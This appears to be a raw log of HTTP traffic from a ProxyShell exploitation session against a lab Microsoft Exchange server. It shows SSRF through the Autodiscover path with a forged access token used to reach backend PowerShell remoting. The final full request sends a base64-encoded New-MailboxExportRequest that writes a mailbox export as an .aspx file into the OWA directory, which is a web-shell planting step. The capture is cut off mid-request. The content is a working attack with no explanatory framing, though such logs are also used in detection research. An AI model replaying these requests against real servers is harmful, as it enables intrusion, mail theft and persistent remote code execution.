xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/ReceiveResponse</a:Action><a:MessageID>uuid:120AB5EA-D10E-4CCE-8DA4-A96DA1C885A4</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:B800BAFE-974D-45D1-9222-75B36A142CF3</a:RelatesTo></s:Header><s:Body><rsp:ReceiveResponse><rsp:Stream Name="stdout">AAAAAAAAAVAAAAAAAAAAAAMAAADKAQAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPjxNUz48VmVyc2lvbiBOPSJwcm90b2NvbHZlcnNpb24iPjIuMzwvVmVyc2lvbj48VmVyc2lvbiBOPSJQU1ZlcnNpb24iPjIuMDwvVmVyc2lvbj48VmVyc2lvbiBOPSJTZXJpYWxpemF0aW9uVmVyc2lvbiI+MS4xLjAuMTwvVmVyc2lvbj48L01TPjwvT2JqPg==</rsp:Stream></rsp:ReceiveResponse></s:Body></s:Envelope> #################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: none Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: application/soap+xml;charset=UTF-8 Content-Length: 1765 <?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:321FB2D8-3428-4F01-8066-0371BA930B81</a:MessageID><p:SessionId mustUnderstand="false">uuid:EF0F132A-2BBC-4280-9360-F02860D911E9</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action><w:OptionSet><w:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">TRUE</w:Option></w:OptionSet><w:SelectorSet><w:Selector Name="ShellId">A45206E8-5119-4982-BEF9-9F2F7C0121B0</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Receive><rsp:DesiredStream>stdout</rsp:DesiredStream></rsp:Receive></env:Body></env:Envelope> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: application/soap+xml;charset=UTF-8 Server: Microsoft-IIS/10.0 request-id: fdfb9445-e572-4554-90f7-ed5008a28aee X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-AspNet-Version: 4.0.30319 Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:44 GMT Content-Length: 2694 <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/ReceiveResponse</a:Action><a:MessageID>uuid:9D171238-0F01-4852-8E7C-D92C1919A8C6</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:321FB2D8-3428-4F01-8066-0371BA930B81</a:RelatesTo></s:Header><s:Body><rsp:ReceiveResponse><rsp:Stream Name="stdout">AAAAAAAAAVEAAAAAAAAAAAMAAAWSAQAAAAkQAgCRcqtkrXe/ToZ0tBT/b01OAAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPjxNUz48T2JqIE49IkFwcGxpY2F0aW9uUHJpdmF0ZURhdGEiIFJlZklkPSIxIj48VE4gUmVmSWQ9IjAiPjxUPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUFNQcmltaXRpdmVEaWN0aW9uYXJ5PC9UPjxUPlN5c3RlbS5Db2xsZWN0aW9ucy5IYXNodGFibGU8L1Q+PFQ+U3lzdGVtLk9iamVjdDwvVD48L1ROPjxEQ1Q+PEVuPjxTIE49IktleSI+U3VwcG9ydGVkVmVyc2lvbnM8L1M+PFMgTj0iVmFsdWUiPjE1LjEuMjE3Ni4yPC9TPjwvRW4+PEVuPjxTIE49IktleSI+SW1wbGljaXRSZW1vdGluZzwvUz48T2JqIE49IlZhbHVlIiBSZWZJZD0iMiI+PFROUmVmIFJlZklkPSIwIiAvPjxEQ1Q+PEVuPjxTIE49IktleSI+SGFzaDwvUz48STMyIE49IlZhbHVlIj4tNDEzODg2MjU1PC9JMzI+PC9Fbj48L0RDVD48L09iaj48L0VuPjxFbj48UyBOPSJLZXkiPlBTVmVyc2lvblRhYmxlPC9TPjxPYmogTj0iVmFsdWUiIFJlZklkPSIzIj48VE5SZWYgUmVmSWQ9IjAiIC8+PERDVD48RW4+PFMgTj0iS2V5Ij5QU1ZlcnNpb248L1M+PFZlcnNpb24gTj0iVmFsdWUiPjUuMS4xNDM5My4zODY2PC9WZXJzaW9uPjwvRW4+PEVuPjxTIE49IktleSI+UFNFZGl0aW9uPC9TPjxTIE49IlZhbHVlIj5EZXNrdG9wPC9TPjwvRW4+PEVuPjxTIE49IktleSI+UFNDb21wYXRpYmxlVmVyc2lvbnM8L1M+PE9iaiBOPSJWYWx1ZSIgUmVmSWQ9IjQiPjxUTiBSZWZJZD0iMSI+PFQ+U3lzdGVtLlZlcnNpb25bXTwvVD48VD5TeXN0ZW0uQXJyYXk8L1Q+PFQ+U3lzdGVtLk9iamVjdDwvVD48L1ROPjxMU1Q+PFZlcnNpb24+MS4wPC9WZXJzaW9uPjxWZXJzaW9uPjIuMDwvVmVyc2lvbj48VmVyc2lvbj4zLjA8L1ZlcnNpb24+PFZlcnNpb24+NC4wPC9WZXJzaW9uPjxWZXJzaW9uPjUuMDwvVmVyc2lvbj48VmVyc2lvbj41LjEuMTQzOTMuMzg2NjwvVmVyc2lvbj48L0xTVD48L09iaj48L0VuPjxFbj48UyBOPSJLZXkiPkNMUlZlcnNpb248L1M+PFZlcnNpb24gTj0iVmFsdWUiPjQuMC4zMDMxOS40MjAwMDwvVmVyc2lvbj48L0VuPjxFbj48UyBOPSJLZXkiPkJ1aWxkVmVyc2lvbjwvUz48VmVyc2lvbiBOPSJWYWx1ZSI+MTAuMC4xNDM5My4zODY2PC9WZXJzaW9uPjwvRW4+PEVuPjxTIE49IktleSI+V1NNYW5TdGFja1ZlcnNpb248L1M+PFZlcnNpb24gTj0iVmFsdWUiPjMuMDwvVmVyc2lvbj48L0VuPjxFbj48UyBOPSJLZXkiPlBTUmVtb3RpbmdQcm90b2NvbFZlcnNpb248L1M+PFZlcnNpb24gTj0iVmFsdWUiPjIuMzwvVmVyc2lvbj48L0VuPjxFbj48UyBOPSJLZXkiPlNlcmlhbGl6YXRpb25WZXJzaW9uPC9TPjxWZXJzaW9uIE49IlZhbHVlIj4xLjEuMC4xPC9WZXJzaW9uPjwvRW4+PC9EQ1Q+PC9PYmo+PC9Fbj48L0RDVD48L09iaj48L01TPjwvT2JqPg==</rsp:Stream></rsp:ReceiveResponse></s:Body></s:Envelope> #################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: none Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: application/soap+xml;charset=UTF-8 Content-Length: 1765 <?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:27B686DC-A44F-41E5-891D-67AF385E4767</a:MessageID><p:SessionId mustUnderstand="false">uuid:EF0F132A-2BBC-4280-9360-F02860D911E9</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action><w:OptionSet><w:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">TRUE</w:Option></w:OptionSet><w:SelectorSet><w:Selector Name="ShellId">A45206E8-5119-4982-BEF9-9F2F7C0121B0</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Receive><rsp:DesiredStream>stdout</rsp:DesiredStream></rsp:Receive></env:Body></env:Envelope> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: application/soap+xml;charset=UTF-8 Server: Microsoft-IIS/10.0 request-id: 6a008910-a03e-4365-87da-8ee0d337adae X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-AspNet-Version: 4.0.30319 Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:45 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:44 GMT Content-Length: 930 <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/ReceiveResponse</a:Action><a:MessageID>uuid:E418DAE0-AD0F-48E0-96FF-EC9FF4D9C45F</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:27B686DC-A44F-41E5-891D-67AF385E4767</a:RelatesTo></s:Header><s:Body><rsp:ReceiveResponse><rsp:Stream Name="stdout">AAAAAAAAAVIAAAAAAAAAAAMAAABnAQAAAAUQAgCRcqtkrXe/ToZ0tBT/b01OAAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPjxNUz48STMyIE49IlJ1bnNwYWNlU3RhdGUiPjI8L0kzMj48L01TPjwvT2JqPg==</rsp:Stream></rsp:ReceiveResponse></s:Body></s:Envelope> #################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: none Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: application/soap+xml;charset=UTF-8 Content-Length: 8221 <?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:D8752694-77F1-42EA-B7F0-45EA48ABF82D</a:MessageID><p:SessionId mustUnderstand="false">uuid:EF0F132A-2BBC-4280-9360-F02860D911E9</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Command</a:Action><w:SelectorSet><w:Selector Name="ShellId">A45206E8-5119-4982-BEF9-9F2F7C0121B0</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:CommandLine CommandId="4798AE77-8B43-43DD-AE37-7ECAFFF79A45"><rsp:Command>Invoke-Expression</rsp:Command><rsp:Arguments>AAAAAAAAAAMAAAAAAAAAAAMAABLYAgAAAAYQAgCRcqtkrXe/ToZ0tBT/b01Od66YR0OL3UOuN37K//eaRe+7vzxPYmogUmVmSWQ9IjAiPgogIDxNUz4KICAgIDxPYmogTj0iUG93ZXJTaGVsbCIgUmVmSWQ9IjEiPgogICAgICA8TVM+CiAgICAgICAgPE9iaiBOPSJDbWRzIiBSZWZJZD0iMiI+CiAgICAgICAgICA8VE4gUmVmSWQ9IjAiPgogICAgICAgICAgICA8VD5TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUFNPYmplY3QsIFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24sIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1XV08L1Q+CiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgICAgICA8L1ROPgogICAgICAgICAgPExTVD4KICAgICAgICAgICAgPE9iaiBSZWZJZD0iMyI+CiAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgPFMgTj0iQ21kIj5OZXctTWFpbGJveEV4cG9ydFJlcXVlc3Q8L1M+CiAgICAgICAgICAgICAgICA8QiBOPSJJc1NjcmlwdCI+ZmFsc2U8L0I+CiAgICAgICAgICAgICAgICA8TmlsIE49IlVzZUxvY2FsU2NvcGUiIC8+CiAgICAgICAgICAgICAgICA8T2JqIE49Ik1lcmdlTXlSZXN1bHQiIFJlZklkPSI0Ij4KICAgICAgICAgICAgICAgICAgPFROIFJlZklkPSIxIj4KICAgICAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlJ1bnNwYWNlcy5QaXBlbGluZVJlc3VsdFR5cGVzPC9UPgogICAgICAgICAgICAgICAgICAgIDxUPlN5c3RlbS5FbnVtPC9UPgogICAgICAgICAgICAgICAgICAgIDxUPlN5c3RlbS5WYWx1ZVR5cGU8L1Q+CiAgICAgICAgICAgICAgICAgICAgPFQ+U3lzdGVtLk9iamVjdDwvVD4KICAgICAgICAgICAgICAgICAgPC9UTj4KICAgICAgICAgICAgICAgICAgPFRvU3RyaW5nPk5vbmU8L1RvU3RyaW5nPgogICAgICAgICAgICAgICAgICA8STMyPjA8L0kzMj4KICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPE9iaiBOPSJNZXJnZVRvUmVzdWx0IiBSZWZJZD0iNSI+CiAgICAgICAgICAgICAgICAgIDxUTlJlZiBSZWZJZD0iMSIgLz4KICAgICAgICAgICAgICAgICAgPFRvU3RyaW5nPk5vbmU8L1RvU3RyaW5nPgogICAgICAgICAgICAgICAgICA8STMyPjA8L0kzMj4KICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPE9iaiBOPSJNZXJnZVByZXZpb3VzUmVzdWx0cyIgUmVmSWQ9IjYiPgogICAgICAgICAgICAgICAgICA8VE5SZWYgUmVmSWQ9IjEiIC8+CiAgICAgICAgICAgICAgICAgIDxUb1N0cmluZz5Ob25lPC9Ub1N0cmluZz4KICAgICAgICAgICAgICAgICAgPEkzMj4wPC9JMzI+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDxPYmogTj0iTWVyZ2VFcnJvciIgUmVmSWQ9IjciPgogICAgICAgICAgICAgICAgICA8VE5SZWYgUmVmSWQ9IjEiIC8+CiAgICAgICAgICAgICAgICAgIDxUb1N0cmluZz5Ob25lPC9Ub1N0cmluZz4KICAgICAgICAgICAgICAgICAgPEkzMj4wPC9JMzI+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDxPYmogTj0iTWVyZ2VXYXJuaW5nIiBSZWZJZD0iOCI+CiAgICAgICAgICAgICAgICAgIDxUTlJlZiBSZWZJZD0iMSIgLz4KICAgICAgICAgICAgICAgICAgPFRvU3RyaW5nPk5vbmU8L1RvU3RyaW5nPgogICAgICAgICAgICAgICAgICA8STMyPjA8L0kzMj4KICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPE9iaiBOPSJNZXJnZVZlcmJvc2UiIFJlZklkPSI5Ij4KICAgICAgICAgICAgICAgICAgPFROUmVmIFJlZklkPSIxIiAvPgogICAgICAgICAgICAgICAgICA8VG9TdHJpbmc+Tm9uZTwvVG9TdHJpbmc+CiAgICAgICAgICAgICAgICAgIDxJMzI+MDwvSTMyPgogICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8T2JqIE49Ik1lcmdlRGVidWciIFJlZklkPSIxMCI+CiAgICAgICAgICAgICAgICAgIDxUTlJlZiBSZWZJZD0iMSIgLz4KICAgICAgICAgICAgICAgICAgPFRvU3RyaW5nPk5vbmU8L1RvU3RyaW5nPgogICAgICAgICAgICAgICAgICA8STMyPjA8L0kzMj4KICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPE9iaiBOPSJBcmdzIiBSZWZJZD0iMTEiPgogICAgICAgICAgICAgICAgICA8VE5SZWYgUmVmSWQ9IjAiIC8+CiAgICAgICAgICAgICAgICAgIDxMU1Q+CiAgICAgICAgICAgICAgICAgICAgPE9iaiBSZWZJZD0iMTAwIj4KICAgICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgICAgPFMgTj0iTiI+LU5hbWU8L1M+CiAgICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlYiPkxQMGhscjdldHA0WjwvUz4KICAgICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICAgICAgPE9iaiBSZWZJZD0iMTAxIj4KICAgICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgICAgPFMgTj0iTiI+LU1haWxib3g8L1M+CiAgICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlYiPnNtY2ludHlyZUBleGNoZy5sYW48L1M+CiAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgICAgIDxPYmogUmVmSWQ9IjEwMiI+CiAgICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICAgIDxTIE49Ik4iPi1JbmNsdWRlRm9sZGVyczwvUz4KICAgICAgICAgICAgICAgICAgICAgICAgPFMgTj0iViI+I0RyYWZ0cyM8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgICAgIDxPYmogUmVmSWQ9IjEwMyI+CiAgICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICAgIDxTIE49Ik4iPi1Db250ZW50RmlsdGVyPC9TPgogICAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJWIj4oU3ViamVjdCAtZXEgJ1FpQ2E4cURNSzEnKTwvUz4KICAgICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICAgICAgPE9iaiBSZWZJZD0iMTA0Ij4KICAgICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgICAgPFMgTj0iTiI+LUV4Y2x1ZGVEdW1wc3RlcjwvUz4KICAgICAgICAgICAgICAgICAgICAgICAgPE5pbCBOPSJWIiAvPgogICAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgICAgICA8T2JqIFJlZklkPSIxMDUiPgogICAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJOIj4tRmlsZVBhdGg8L1M+CiAgICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlYiPlxcXFx3aW4tYnBpZDk1YWNxN2UuZXhjaGcubGFuXEMkXFByb2dyYW0gRmlsZXNcTWljcm9zb2Z0XEV4Y2hhbmdlIFNlcnZlclxWMTVcRnJvbnRFbmRcSHR0cFByb3h5XG93YVxhdXRoXDlDVEVvc3dUMi5hc3B4PC9TPgogICAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgICAgPC9MU1Q+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICA8L09iaj4KICAgICAgICAgIDwvTFNUPgogICAgICAgIDwvT2JqPgogICAgICAgIDxCIE49IklzTmVzdGVkIj5mYWxzZTwvQj4KICAgICAgICA8TmlsIE49Ikhpc3RvcnkiIC8+CiAgICAgICAgPEIgTj0iUmVkaXJlY3RTaGVsbEVycm9yT3V0cHV0UGlwZSI+dHJ1ZTwvQj4KICAgICAgPC9NUz4KICAgIDwvT2JqPgogICAgPEIgTj0iTm9JbnB1dCI+dHJ1ZTwvQj4KICAgIDxPYmogTj0iQXBhcnRtZW50U3RhdGUiIFJlZklkPSIyMyI+CiAgICAgIDxUTiBSZWZJZD0iMiI+CiAgICAgICAgPFQ+U3lzdGVtLlRocmVhZGluZy5BcGFydG1lbnRTdGF0ZTwvVD4KICAgICAgICA8VD5TeXN0ZW0uRW51bTwvVD4KICAgICAgICA8VD5TeXN0ZW0uVmFsdWVUeXBlPC9UPgogICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgIDwvVE4+CiAgICAgIDxUb1N0cmluZz5Vbmtub3duPC9Ub1N0cmluZz4KICAgICAgPEkzMj4yPC9JMzI+CiAgICA8L09iaj4KICAgIDxPYmogTj0iUmVtb3RlU3RyZWFtT3B0aW9ucyIgUmVmSWQ9IjI0Ij4KICAgICAgPFROIFJlZklkPSIzIj4KICAgICAgICA8VD5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlJlbW90ZVN0cmVhbU9wdGlvbnM8L1Q+CiAgICAgICAgPFQ+U3lzdGVtLkVudW08L1Q+CiAgICAgICAgPFQ+U3lzdGVtLlZhbHVlVHlwZTwvVD4KICAgICAgICA8VD5TeXN0ZW0uT2JqZWN0PC9UPgogICAgICA8L1ROPgogICAgICA8VG9TdHJpbmc+MDwvVG9TdHJpbmc+CiAgICAgIDxJMzI+MDwvSTMyPgogICAgPC9PYmo+CiAgICA8QiBOPSJBZGRUb0hpc3RvcnkiPnRydWU8L0I+CiAgICA8T2JqIE49Ikhvc3RJbmZvIiBSZWZJZD0iMjUiPgogICAgICA8TVM+CiAgICAgICAgPEIgTj0iX2lzSG9zdE51bGwiPnRydWU8L0I+CiAgICAgICAgPEIgTj0iX2lzSG9zdFVJTnVsbCI+dHJ1ZTwvQj4KICAgICAgICA8QiBOPSJfaXNIb3N0UmF3VUlOdWxsIj50cnVlPC9CPgogICAgICAgIDxCIE49Il91c2VSdW5zcGFjZUhvc3QiPnRydWU8L0I+CiAgICAgIDwvTVM+CiAgICA8L09iaj4KICAgIDxCIE49IklzTmVzdGVkIj5mYWxzZTwvQj4KICA8L01TPgo8L09iaj4K</rsp:Arguments></rsp:CommandLine></env:Body></env:Envelope> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: application/soap+xml;charset=UTF-8 Server: Microsoft-IIS/10.0 request-id: 8e32123c-4c0b-4c26-82d3-54790f73c4d6 X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-AspNet-Version: 4.0.30319 Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:45 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:44 GMT Content-Length: 847 <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/CommandResponse</a:Action><a:MessageID>uuid:3EDF3334-08DD-457B-B720-8BB44441B0B2</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:D8752694-77F1-42EA-B7F0-45EA48ABF82D</a:RelatesTo></s:Header><s:Body><rsp:CommandResponse><rsp:CommandId>4798AE77-8B43-43DD-AE37-7ECAFFF79A45</rsp:CommandId></rsp:CommandResponse></s:Body></s:Envelope> #################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1 Host: 192.168.159.42 